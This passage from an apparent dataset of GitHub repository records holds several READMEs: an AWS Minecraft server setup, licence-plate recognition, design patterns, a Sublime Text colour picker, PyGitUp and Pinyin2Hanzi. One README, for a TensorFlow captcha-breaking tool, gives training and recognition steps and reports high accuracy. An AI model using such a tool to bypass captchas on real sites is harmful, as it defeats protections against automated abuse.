downloaded.\n\n\tTHIS MIGHT BE SUBJECT TO CHANGE\n\t\tec2_keypair = 'YourKeyPairName'\n\t\tSSH_KEY_FILE_PATH = './YourKeyFileName.pem'\n\n4. This step is concerned with creating the AWS instance. View [https://docs.aws.amazon.com/general/latest/gr/rande.html](https://docs.aws.amazon.com/general/latest/gr/rande.html) (Or google AWS Regions), and copy the **Region** column for the **Region Name** of where you wish to host your server. In **configuration.py** of the root directory, set the **ec2_region** variable to the copied value.\n\n\tec2_region = \"Your-Region-Here\"\n\n5. Navigate to [https://aws.amazon.com/ec2/instance-types/](https://aws.amazon.com/ec2/instance-types/) and select one of the T3 types (with the memory and CPU you desire, I recommend 10 players/GB). Copy the value in the **Model** column. I've configured mine to use **t3.small**. In **configuration.py** of the root directory, set the **ec2_instancetype** variable to the copied value.\n\n\tec2_instancetype = 't3.yourSizeHere'\n\n6. Then we must select an image for the instance to boot. Navigate to [https://cloud-images.ubuntu.com/locator/ec2/](https://cloud-images.ubuntu.com/locator/ec2/), in the filter at the bottom of the screen, select your region of choice under **Zone**, pick any LTS (Latest Stable) under **Version**, under **Arch** select **amd64**, and **hvm:ebs** under **Instance Type**. Select one of the images available and copy the **AMI-ID**. In **configuration.py** of the root directory, set the **ec2_amis** variable to the copied value.\n\n\tec2_amis = ['ami-YourImageIdHere']\n\n7. At this point you should have the necessary configuration to create a new instance through the **createInstance.py** script in the **root** folder. Open a command line in the utilityScripts directory of the project, and execute:\n\n\tpip install -r requirements.txt\n\t\n\tAfter successful installation of dependencies execute:\n\n\tpython utilityScripts/createInstance.py\n\n\tCopy the **Instance ID** that is output into the terminal. In **configuration.py** of the root directory, set the **INSTANCE_ID** variable to the copied value.\n\n\tINSTANCE_ID = 'i-yourInstanceIdHere'\n\n\n# Web Application Deployment\nIn this step the project will get deployed to Heroku's free hosting. This part of the application provides a rudimentary UI and Web URL for users to start the server.\n\nBefore deployment it will be important to set the password for the server to start. In **configuration.py** of the root directory, set the **SERVER_PASSWORD** variable to the password of your choosing.\n\n SERVER_PASSWORD='YourPasswordHere'\n 1. Create or have access to a Heroku account.\n 2. Install and setup the **Heroku CLI** onto your computer. [https://devcenter.heroku.com/articles/heroku-cli#download-and-install](https://devcenter.heroku.com/articles/heroku-cli#download-and-install)\n 3. In the command line for the directory of this project, type:\n\t heroku create YourProjectNameHere\n4. Once this new project has been created, it is time to push the project to Heroku.\n\tgit push heroku master\n5. The URL to your hosted site should be: YourProjectNameHere.herokuapp.com\n6. Access your site and launch/access your server!\n\n# AWS Instance Configuration\nThis step will configure the AWS Linux server to run the minecraft server. It will include SSH connecting to the server, gaining admin privileges, installing java, directory setup, moving shell scripts onto the server, and making a CRON job for these shell scripts. Note that this step will include both an SSH client and a File Transfer client (such as FileZilla) on your PC.\n1. The first step will be to get SSH into the server instance. Using the key downloaded from AWS in the section above, add this key to PuTTY or simply access it through command line. The IP address can be obtained by entering the server password on the site, or through the EC2 Dashboard, selecting the iPV4 address from the corresponding instanceID in your configuration file. For MacOS and Linux systems\n\n\tssh -i pathToYourKeyFileHere ubuntu@IPAddress\n\n2. Make the ubuntu user admin if it isn't already with:\n \n\tadduser ubuntu sudo\n\n3. The next step will be to install JavaJDK onto your system. For newer versions you may enter:\n\tsudo apt install openjdk-11-jdk-headless\n\tIf this doesn't work you can use sudo apt list and search through these packages for an alternative java version.\n\n4. Open up an FTP client such as FileZilla and connect to the same address as the same user with the same IP address. Drag all files from the **instanceSetup** folder from this repository, into the root directory of the current user (probably **ubuntu**, for the purposes of these commands I will be using **ubuntu**, but feel free to replace with your own user if appropriate).\n\n5. Download the desired Minecraft server version from [https://www.minecraft.net/en-us/download/server/](https://www.minecraft.net/en-us/download/server/), rename it **server.jar** and drag it into the root directory of the user using FileZilla.\n\n6. Using the FTP client, create a new folder in the root directory of the current user called **screens** \nOR \nIn the SSH client, create a folder in the current directory with the command:\n\tsudo mkdir screens\n7. Then execute the following command:\n sudo chmod 700 /home/ubuntu\n8. Then execute the next command:\n export SCREENDIR=/home/ubuntu/screens\n9. Then execute the command:\n sudo crontab /home/ubuntu/crontab -u ubuntu\n\n\tFeel free to close the server through the AWS console or execute the command:\n\tsudo /sbin/shutdown -P +1\n\nAt this point you may restart the server from the Web Application using the password you configured. You should then be able to play!\n\n# Additional Remarks\n## Minecraft Memory Configuration\nThe server startup command does not specify memory constraints by default, but is available to be specified in Configuration.py. In the event that you configure this from an empty string, **the trailing space is required** as in the example below. Traditional minecraft server flags apply for this configuration.\nMEMORY_ALLOCATION='-Xmx1024M -Xms1024M '\n## UI Configuration\nThe title and header for the site can be changed in **/templates/index.html**. Feel free to add any more content or styling to the site, though be careful not to change any form, input, button, or script elements in the template.\n\n## Server Maintenance\nMaintaining the server is fairly straightforward and is done primarily through FileZilla. Updating the server file can be done by downloading the new server file, renaming it to **server.jar** and replacing the old file on the server. The world file can be backed up to your PC manually though there is no automated process at this time.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MicrocontrollersAndMore/OpenCV_3_License_Plate_Recognition_Python", "link": "https://github.com/MicrocontrollersAndMore/OpenCV_3_License_Plate_Recognition_Python", "tags": [], "stars": 512, "description": null, "lang": "Python", "repo_lang": "", "readme": "The video pretty much explains it all:\nhttps://www.youtube.com/watch?v=fJcl6Gw1D8k\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PatrickLib/captcha_recognize", "link": "https://github.com/PatrickLib/captcha_recognize", "tags": ["captcha-breaking", "python", "tensorflow", "captcha", "image-recognition-captchas"], "stars": 512, "description": "Image Recognition captcha without image segmentation \u65e0\u9700\u56fe\u7247\u5206\u5272\u7684\u9a8c\u8bc1\u7801\u8bc6\u522b", "lang": "Python", "repo_lang": "", "readme": "Introduce\n=========\n### Translation: [English](https://github.com/PatrickLib/captcha_recognize/blob/master/README.md) [\u4e2d\u6587](https://github.com/PatrickLib/captcha_recognize/blob/master/README-zhcn.md)\n\nimage recognition captchas using TensorFlow, no need image segmentation, run on ubuntu 16.04, python 2.7\n\n![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CMQVA_num717_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CMQZJ_num908_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CRGEU_num339_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CZHBN_num989_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/DZPEW_num388_1.png)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/CZWED_num21_1.png)\n\naccuracy 99.7% judged by captcha_eval.py, training size 50000, after 20000 steps\ncaptcha generator: https://github.com/lepture/captcha\n\n![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1ab2s_num286.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1ezx8_num398.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1iv22_num346.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1kxw2_num940.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/3mtj9_num765.jpg)![captcha](https://raw.githubusercontent.com/PatrickLib/captcha_recognition/master/data/test_data/1vuy5_num17.jpg)\n\naccuracy 52.1% judged by captcha_eval.py, training size 100000, after 200000 steps\ncaptcha generator: https://github.com/Gregwar/CaptchaBundle\n \nDependence\n==========\n### python 2.7\n### Anaconda2 4.3.1\nhttps://www.continuum.io/downloads#linux\n### TensorFlow 1.1\nhttps://github.com/tensorflow/tensorflow\n### captcha\nhttps://pypi.python.org/pypi/captcha/0.1.1\n\nUsage\n=====\n## 1.prepare captchas\nput your own captchas in **/data/train_data/** for training, **/data/valid_data/** for evaluating and **/data/test_data/** for recognize testing, images file name must be **label_\\*.jpg** or **label_\\*.png** and recommend size **128x48**. you can also use default generation:\n```\npython captcha_gen_default.py\n```\n\n## 2.convert dataset to tfrecords\nthe result file will be **/data/train.tfrecord** and **/data/valid.tfrecord**\n```\npython captcha_records.py\n```\n\n## 3.training\ntrain and evaluate neural network on CPU or one single GPU\n```\npython captcha_train.py\n```\nyou can also train over multiple GPUs\n```\npython captcha_multi_gpu_train.py\n```\n\n## 4.evaluate\n```\npython captcha_eval.py\n```\n\n## 5.recognize\nread captchas from **/data/test_data/** for recogition\n```\npython captcha_recognize.py\n```\nresult like this\n```\n...\nimage WFPMX_num552.png recognize ----> 'WFPMX'\nimage QUDKM_num468.png recognize ----> 'QUDKM'\n```\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RefactoringGuru/design-patterns-python", "link": "https://github.com/RefactoringGuru/design-patterns-python", "tags": ["design-patterns", "python"], "stars": 513, "description": "Design Pattern Examples in Python", "lang": "Python", "repo_lang": "", "readme": "# Design Patterns in Python\n\nThis repository is part of the [Refactoring.Guru](https://refactoring.guru/design-patterns) project.\n\nIt contains Python examples for all classic GoF design patterns.\n\nEach pattern includes two examples:\n\n- [x] **Conceptual** examples show the internal structure of patterns, including detailed comments.\n\n- [ ] **RealWorld** examples show how patterns can be used in real-world Python applications.\n\n\n## Requirements\n\nThese examples require Python 3.7 and newer.\n\nAll examples can be launched via the command line, using the Python executable as follows:\n\n```sh\npython src/Path-to-example/main.py\n```\n\nFor the best experience, I recommend working with examples with these IDEs:\n\n- [PyCharm](https://www.jetbrains.com/pycharm/)\n- [Visual Studio Code](https://code.visualstudio.com/) with the [Python extension](https://marketplace.visualstudio.com/items?itemName=ms-python.python)\n\n## FAQ\n\n#### 1. What is the _Client Code_?\n\n_Client_ means _client of classes, defined as part of a pattern_, which is merely a caller of the given methods or a user of the given classes. In other words, it's the part of your application's code that uses the pattern's classes.\n\n#### 2. I don't understand the roles you're referring to in RealWorld examples.\n\nTake a look at the conceptual example first. There you'll find detailed descriptions of each class in a pattern, its role, and connection to other classes.\n\n\n## Contributor's Guide\n\nI appreciate any help, whether it's a simple fix of a typo or a whole new example. Just [make a fork](https://help.github.com/articles/fork-a-repo/), make your change and submit a [pull request](https://help.github.com/articles/creating-a-pull-request-from-a-fork/).\n\nHere's a style guide which might help you to keep your changes consistent with the rest of the project's code:\n\n1. All code should match the [PEP 8 coding style guide](https://www.python.org/dev/peps/pep-0008/)\n\n2. Try to hard-wrap the code at 80th's character. It helps to list the code on the website without scrollbars.\n\n3. Aim to put all code within one file. Yes, I realize that it's not how it supposed to be done in production. However, it helps people to understand examples better, since all code fits into one screen.\n\n4. Comments may or may not have language tags in them, such as this:\n\n ```python\n \"\"\"\n EN: All products families have the same varieties (MacOS/Windows).\n\n This is a MacOS variant of a button.\n\n RU: \u0412\u0441\u0435 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u0438\u043c\u0435\u044e\u0442 \u043e\u0434\u043d\u0438 \u0438 \u0442\u0435 \u0436\u0435 \u0432\u0430\u0440\u0438\u0430\u0446\u0438\u0438 (MacOS/Windows).\n\n \u042d\u0442\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043a\u043d\u043e\u043f\u043a\u0438 \u043f\u043e\u0434 MacOS.\n \"\"\"\n ```\n \n This notation helps to keep the code in one place while allowing the website to generates separate versions of examples for all listed languages. Don't be scared and ignore the non-English part of such comments. If you want to change something in a comment like this, just do it. Even if you do it wrong, we'll tell you how to fix it during the Pull Request.\n\n\n## License\n\nThis work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.\n\n\"Creative\n\n## Credits\n\nAuthors: Alexey Pyltsyn ([@lex111](https://github.com/lex111)) and Alexander Shvets ([@neochief](https://github.com/neochief))\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "weslly/ColorPicker", "link": "https://github.com/weslly/ColorPicker", "tags": [], "stars": 512, "description": "Color picker for Sublime Text", "lang": "Python", "repo_lang": "", "readme": "###Mac OSX\n![Mac OSX](http://i.minus.com/i5KI6SBAfs7Qk.png \"Mac OS X\")\n\n###Linux\n![Linux](http://i.minus.com/ihwLvn8m29GxZ.png \"Linux\")\n\n###Windows\n![Windows](http://i.minus.com/iY1DDCRG5TsyR.png \"Windows\")\n\n## Installation\nInstall this repository via [Package Control](https://sublime.wbond.net).\n\n\n## Usage\nTo insert or change a selected color, use:\n\n- Linux: `ctrl+shift+c`\n- Windows: `ctrl+shift+c`\n- OS X: `cmd+shift+c`\n\nor use menu action\n\n- **`Tools`** -> **`ColorPicker`**\n\n\nBy default, the hex color code is inserted using uppercase letters. To use lowercase letters instead, copy the contents of **`Preferences -> Package Settings -> ColorPicker -> Settings-Default`** to the empty file created by selecting **`Preferences -> Package Settings -> ColorPicker -> Settings-User`**, then change `\"color_upper_case\"` to `false`.\n\n## Calling from Other Plugins\nTo commands are provided to assist in calling a color picker from other plugins. Info is shared between the plugins via a settings file. It does not have to exist on disk; it can exist only in memory for the sole purpose of sharing the return. It is advised to use a unique name for the settings file. The data is returned in the settings key `color_pick_return`. It is advised to set `color_pick_return` to `None` in your settings file before calling any of the commands. So you can tell if it set teh variable or not.\n\n### ColorPickApiIsAvailableCommand\nThis command is used to test if ColorPicker is installed.\n\n```python\n>> settings = sublime.load_settings('my_shared.sublime-settings')\n>> settings.set('color_pick_return', None)\n>> sublime.run_command('color_pick_api_is_available', {'settings': 'my_shared.sublime-settings'})\n>> print(settings.get('color_pick_return'))\nTrue\n```\n\n### ColorPickApiGetColorCommand\nThis command is used to call a color picker and get the selected value. It takes a setings file and an optional `default_color`.\n\n```python\n>> settings = sublime.load_settings('my_shared.sublime-settings')\n>> settings.set('color_pick_return', None)\n>> sublime.run_command('color_pick_api_get_color', {'settings': 'my_shared.sublime-settings', 'default_color': '#ff0000'})\n>> print(settings.get('color_pick_return'))\n#23af44\n```\n\n## Acknowledgements\n\n- [Original colorpick plugin for OS X by jnordberg](https://github.com/jnordberg/sublime-colorpick/)\n- [Original colorpick plugin for Windows by animehunter](https://github.com/animehunter/SublimeColorPickerWindowsOnly)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "msiemens/PyGitUp", "link": "https://github.com/msiemens/PyGitUp", "tags": ["python", "git"], "stars": 512, "description": "A nicer `git pull`", "lang": "Python", "repo_lang": "", "readme": "PyGitUp |Version| |Build Status| |Coverage Status|\n==================================================\n\n|PyGitUp|_ is a Python port of\n`aanand/git-up `__. It not only\nfully covers the abilities of git-up and should be a drop-in replacement,\nbut also extends it slightly.\n\n.. |PyGitUp| replace:: ``PyGitUp``\n.. _PyGitUp: https://github.com/msiemens/PyGitUp\n\nWhy use ``git up``?\n-------------------\n\n git pull has two problems:\n\n * It merges upstream changes by default, when it's really more polite to `rebase\n over them `__,\n unless your collaborators enjoy a commit graph that looks like bedhead.\n\n * It only updates the branch you're currently on, which means git push will\n shout at you for being behind on branches you don't particularly care about\n right now.\n\n (https://github.com/aanand/git-up/)\n\nDemonstration\n-------------\n\n.. image:: http://i.imgur.com/EC3pvYu.gif\n\nWhy use the Python port?\n------------------------\n\nI wasn't able to use the original ``git-up``, because I didn't want to install\na whole Ruby suite just for `git-up` and even with Ruby installed, there were\nsome problems running on my Windows machine. So, my reasons for writing\nand using this port are:\n\n1. Windows support.\n2. Written in Python ;)\n\nHow do I install it?\n--------------------\n\n1. Install ``git-up`` via `pip `__: ``$ pip install git-up``\n2. ``cd`` to your project's directory.\n3. Run ``git up`` and enjoy!\n\nHomebrew users can also use ``brew``: ``brew install pygitup``\n\nHow to run it locally?\n----------------------\n\nCould also checkout the **.github/workflows/ci-workflow.yml**\n\n1. clone repo and ``cd`` to repo directory.\n2. Install ``poetry`` as guided by `poetry installation doc `__\n3. Run ``poetry install``\n4. Run program with ``poetry run git-up``\n5. Run all tests with ``poetry run pytest -v --cov=PyGitUp`` or ``poetry run pytest -v --cov=PyGitUp --cov-report html``\n6. Run one test with ``poetry run pytest -q PyGitUp/tests/test_version.py -v --cov=PyGitUp``\n\nNote for Windows users:\n~~~~~~~~~~~~~~~~~~~~~~~\n\nSee `these instructions `__\nfor installing pip, if you haven't already installed it. And don't forget\nto either:\n\n- make your ``Python/Scripts`` and ``Python/Lib/site-packages`` writable for\n you,\n- run ``pip`` with admin privileges\n- or use ``pip install --user git-up`` and add ``%APPDATA%/Python/Scripts``\n to ``%PATH%``.\n\nOtherwise pip will refuse to install ``git-up`` due to ``Access denied`` errors.\n\nPython version compatibility:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nPython 3.7 and upwards are supported :)\n\nOptions and Configuration\n-------------------------\n\nCommand Line Arguments\n~~~~~~~~~~~~~~~~~~~~~~\n\n- ``git up -h`` shows a help message.\n\n- ``git up --quiet`` suppresses all output except for error messages.\n\n- ``git up --no-fetch`` skips fetching the remote and rebases all local branches.\n\n- ``git up --version`` shows the current version and optionally checks for\n updates (see below).\n\nConfiguration\n~~~~~~~~~~~~~\n\nTo configure ``PyGitUp``, you can set options in your git config. Run\n``git config [--global] git-up.[name] [value]`` to set one of these\noptions:\n\n- ``git-up.fetch.prune [*true*|false]``: If set to ``true``,\n ``PyGitUp`` will append the ``--prune``\\ option to ``git fetch`` and\n thus remove any remote tracking branches which no longer exist on\n the remote (see `git fetch\n --help `__).\n\n- ``git-up.fetch.all [true|*false*]``: If set to ``false``, ``PyGitUp``\n will only fetch remotes for which there is at least one local\n tracking branch. Setting this option will make ``git up`` always fetch\n from all remotes, which is useful if e.g. you use a remote to push to\n your CI system but never check those branches out.\n\n- ``git-up.push.auto [true|*false*]``: Push the current branch after\n rebasing and fast-forwarding.\n\n- ``git-up.push.all [true|*false*]``: Push all branches when auto-pushing.\n\n- ``git-up.push.tags [true|*false*]``: Push tags when auto-pushing.\n\n- ``git-up.rebase.arguments [string]``: If set, ``PyGitUp`` will use\n this string as additional arguments when calling ``git rebase``.\n Example: ``--preserve-merges`` to recreate merge commits in the\n rebased branch.\n\n- ``git-up.rebase.auto [*true*|false]``: If set to ``false``,\n ``PyGitUp`` won't rebase your branches for you but notify you that\n they diverged. This can be useful if you have a lot of in-progress\n work that you don't want to deal with at once, but still want to\n update other branches.\n\n- ``git-up.rebase.log-hook [cmd]``: Runs ``cmd`` every time a branch\n is rebased or fast-forwarded, with the old head as ``$1`` and the new\n head as ``$2``. This can be used to view logs or diffs of incoming\n changes. Example:\n ``echo \"changes on $1:\"; git log --oneline --decorate $1..$2``.\n\n- ``git-up.rebase.show-hashes [true|*false*]``: If set to ``true``,\n ``PyGitUp`` will show the hashes of the current commit (or the point\n where the rebase starts) and the target commit like ``git pull`` does.\n\nNew in v1.0.0:\n~~~~~~~~~~~~~~\n\n- ``git-up.updates.check [*true*|false]``: When running ``git up --version``,\n it shows the version number and checks for updates. If you feel\n uncomfortable with it, just set it to ``false`` to turn off the checks.\n\nCredits\n-------\n\nThe original ``git-up`` has been written by aanand:\n`aanand/git-up/ `__.\n\n\nChangelog\n---------\n\nv2.2.0 (*2022-11-21*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Add support for Python 3.11. Thanks\n `@hugovk `_ for `Pull Request #118\n `_.\n\nv2.1.0 (*2021-10-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Switch to Python's ``argparse`` for CLI argument parsing. Thanks\n `@ekohl `_ for `Pull Request #96\n `_.\n\nv2.0.3 (*2021-09-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Drop support for Python 3.6 (following GitPython)\n- Update PyGitUp's CLI argument parser `Click `_\n to version 8.0. Thanks `@hugovk `_\n for `Pull Request #109 `_.\n- Update other dependencies\n\nv2.0.2 (*2020-12-30*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Remove old Python 2 code. Thanks `@hugovk `_\n for `Pull Request #104 `_.\n\nv2.0.1 (*2020-08-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Update dependencies\n\nv2.0.0 (*2020-08-15*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Drop Python 2 support in order to fix `Issue 102 `_\n- Drop Ruby Bundler integration\n- Migrate tests to ``py.test``\n\nv1.6.1 (*2018-12-12*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Upgrade to click>=7.0.0. Thanks `@no-preserve-root `_\n for `Pull Request #87 `_.\n\nv1.6.0 (*2018-10-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Skip stashing changes when possible. Thanks `@Chronial `_\n for `Pull Request #86 `_.\n- Added faster fast-forward on branches that are not checked out. Thanks `@Chronial `_\n for `Pull Request #83 `_.\n\nv1.5.2 (*2018-09-28*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed version requirement for Click dependency (`#82 `__).\n\nv1.5.1 (*2018-09-13*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed crash on Cygwin with rebase log hook enabled (`#80 `__).\n\nv1.5.0 (*2018-04-26*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added auto-push support. Thanks `@WoLpH `_\n for `Pull Request #74 `_.\n\nv1.4.7 (*2018-04-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added shorthand commandline arguments (``-V, -q, -h``, see `#73 `__).\n\nv1.4.6 (*2017-12-19*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated (see `#65 `__).\n\nv1.4.5 (*2017-01-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problems when working with branches containing hash signs in their name\n (`#55 `__).\n- No longer installs a now unneeded script on ``pip install``. Thanks `@ekohl `_\n for `Pull Request #60 `_.\n\nv1.4.4 (*2016-11-30*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug when working with ``git worktree`` (`#58 `__).\n\nv1.4.3 (*2016-11-22*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug with GitPython <= 2.0.8 (`#56 `__, `#57 `__).\n\nv1.4.2 (*2016-09-29*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Switched the command line argument parsing library (`#53 `__).\n\nv1.4.1 (*2016-08-02*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Include tests in PyPI distribution (`#51 `__).\n\nv1.4.0 (*2016-02-29*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated.\n- Dependencies on 3rd party libraries have been loosened to better interact with other installed packages.\n Thanks `MaximilianR `_ for `Pull Request #45 `_.\n- Added an command line argument to turn of fetching (``--no-fetch``). Thanks `@buoto `_\n for `Pull Request #46 `_.\n- Don't show a stacktrace anymore when stashing fails (`#35 `_).\n- Fixed a bug that caused problems with submodules if the submodule had unstashed changes/ Thanks\n `@Javex `_ for `Pull Request #27 `_.\n\nv1.3.1 (*2015-08-31*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a bug when showing the version on Python 3 `#34 `__.\n\nv1.3.0 (*2015-04-08*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Support for Python 3 has been added. Thanks `@r4ts0n `_\n for `Pull Request #23 `_\n and `@Byron `_ for quickly merging a Pull Request\n in `GitPython `_\n and releasing a new version on which this release depends.\n\nv1.2.2 (*2015-02-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Now updates submodules when called from ``git submodule foreach`` (`#8 `__).\n\nv1.2.1 (*2014-12-16*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed a problem with ``setuptools 8.x`` (`#19 `__).\n- 3rd party dependencies have been updated\n\nv1.2.0 (*2014-12-10*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Added an option to show hashes when fast-forwarding/rebasing like ``git pull``\n does (``git-up.rebase.show-hashes``).\n- Fixed a bug when having branches with both local tracking branches and\n remote tracking branches (`#17 `__).\n\nv1.1.5 (*2014-11-19*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- 3rd party dependencies have been updated to fix a problem with a 3rd party\n library (`#18 `__).\n\nv1.1.4 (*2014-04-18*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed some typos in README and ``PyGitUp`` output.\n- 3rd party dependencies have been updated.\n\nv1.1.3 (*2014-03-23*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- ``ahead of upstream`` messages are now cyan (see `aanand/git-up#60 `__).\n- Fixed problem when using % in the log hook (`#11 `__).\n\nv1.1.2 (*2013-10-08*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problems with the dependency declaration.\n\nv1.1.1 (*2013-10-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fix for `#7 `__\n (AttributeError: 'GitUp' object has no attribute 'git') introduced by\n v1.1.0.\n\nv1.1.0 (*2013-10-07*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Prior to v1.1.0, ``PyGitUp`` tried to guess the upstream branch for a local\n branch by looking for a branch on any remote with the same name. With v1.1.0,\n ``PyGitUp`` stops guessing and uses the upstream branch config instead.\n\n This by the way fixes issue `#6 `__\n (``git up`` doesn't work with local only branches).\n\n **Note:**\n This change may break setups, where a local branch accidentally has\n the same name as a remote branch without any tracking information set. Prior\n to v1.1.0, ``git up`` would still fetch and rebase from the remote branch.\n If you run into troubles with such a setup, setting tracking information\n using ``git branch -u / `` should help.\n\n- 3rd party dependencies have been updated.\n\n- Allows to run ``git up --version`` from non-git dirs, too.\n\nv1.0.0 (*2013-09-05*)\n~~~~~~~~~~~~~~~~~~~~~\n\nFinally ``PyGitUp`` reaches 1.0.0. You can consider it stable now :)\n\n- Added a comprehensive test suite, now with a coverage of about 90%.\n- Lots of code cleanup.\n- Added option ``-h`` to display a help screen (``--help`` **won't** work, because\n ``git`` catches this option and handles it before ``PyGitUp`` can do).\n- Added option ``--version`` to show, what version of ``PyGitUp`` is running.\n Also checks for updates (can be disabled, see configuration).\n- Added option ``--quiet`` to be quiet and only display error messages.\n\nv0.2.3 (*2013-06-05*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed issue `#4 `__ (ugly\n exception if remote branch has been deleted).\n\nv0.2.2 (*2013-05-04*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed issue `#3 `__ (didn't\n return to previous branch).\n\n\nv0.2.1 (*2013-03-18*)\n~~~~~~~~~~~~~~~~~~~~~\n\n- Fixed problem: check-bundler.rb has not been installed when installing via\n PyPI (problems with setup.py).\n\nv0.2 (*2013-03-18*)\n~~~~~~~~~~~~~~~~~~~\n\n- Incorporated `aanand/git-up#41 `__: Support for ``bundle install --local`` and\n ``rbenv rehash``.\n- Fixed issue `#1 `__ (strange\n output buffering when having multiple remotes to fetch from).\n- Some under-the-hood improvements.\n\nv0.1 (*2013-03-14*)\n~~~~~~~~~~~~~~~~~~~\n\n- Initial Release\n\n.. |Build Status| image:: https://img.shields.io/azure-devops/build/msiemens/3e5baa75-12ec-43ac-9728-89823ee8c7e2/1.svg?style=flat-square\n :target: https://dev.azure.com/msiemens/github/_build?definitionId=1\n\n.. |Coverage Status| image:: http://img.shields.io/coveralls/msiemens/PyGitUp/master.svg?style=flat-square\n :target: https://coveralls.io/r/msiemens/PyGitUp\n\n.. |Version| image:: http://img.shields.io/pypi/v/git-up.svg?style=flat-square\n :target: https://pypi.python.org/pypi/git-up\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "letiantian/Pinyin2Hanzi", "link": "https://github.com/letiantian/Pinyin2Hanzi", "tags": [], "stars": 512, "description": "\u62fc\u97f3\u8f6c\u6c49\u5b57\uff0c \u62fc\u97f3\u8f93\u5165\u6cd5\u5f15\u64ce\uff0c pin yin -> \u62fc\u97f3", "lang": "Python", "repo_lang": "", "readme": "# Pinyin2Hanzi\n\n\u62fc\u97f3\u8f6c\u6c49\u5b57\uff0c\u53ef\u4ee5\u4f5c\u4e3a\u62fc\u97f3\u8f93\u5165\u6cd5\u7684\u8f6c\u6362\u5f15\u64ce\uff0c\u517c\u5bb9Python 2\u3001Python 3\u3002\n\n## \u5b89\u88c5\nPython 2\uff1a\n```\n$ python setup.py install --user\n```\n\nPython 3\uff1a\n```\n$ python3 setup.py install --user\n```\n\n## \u4f7f\u7528\n\u4e0b\u9762\u7684\u793a\u4f8b\u5728Python 3\u4e2d\u8fd0\u884c\u3002\n\n#### \u57fa\u4e8eHMM\u7684\u8f6c\u6362\n\u539f\u7406\u662fviterbi\u7b97\u6cd5\u3002\n\n```python\nfrom Pinyin2Hanzi import DefaultHmmParams\nfrom Pinyin2Hanzi import viterbi\n\nhmmparams = DefaultHmmParams()\n\n## 2\u4e2a\u5019\u9009\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhi', 'bu', 'zhi', 'dao'), path_num = 2)\nfor item in result:\n print(item.score, item.path)\n'''\u8f93\u51fa\n1.3155294593897203e-08 ['\u4f60', '\u77e5', '\u4e0d', '\u77e5', '\u9053']\n3.6677865125992192e-09 ['\u4f60', '\u53ea', '\u4e0d', '\u77e5', '\u9053']\n'''\n\n## 2\u4e2a\u5019\u9009\uff0c\u4f7f\u7528\u5bf9\u6570\u6253\u5206\nresult = viterbi(hmm_params=hmmparams, observations=('ni', 'zhi', 'bu', 'zhi', 'dao'), path_num = 2, log = True)\nfor item in result:\n print(item.score, 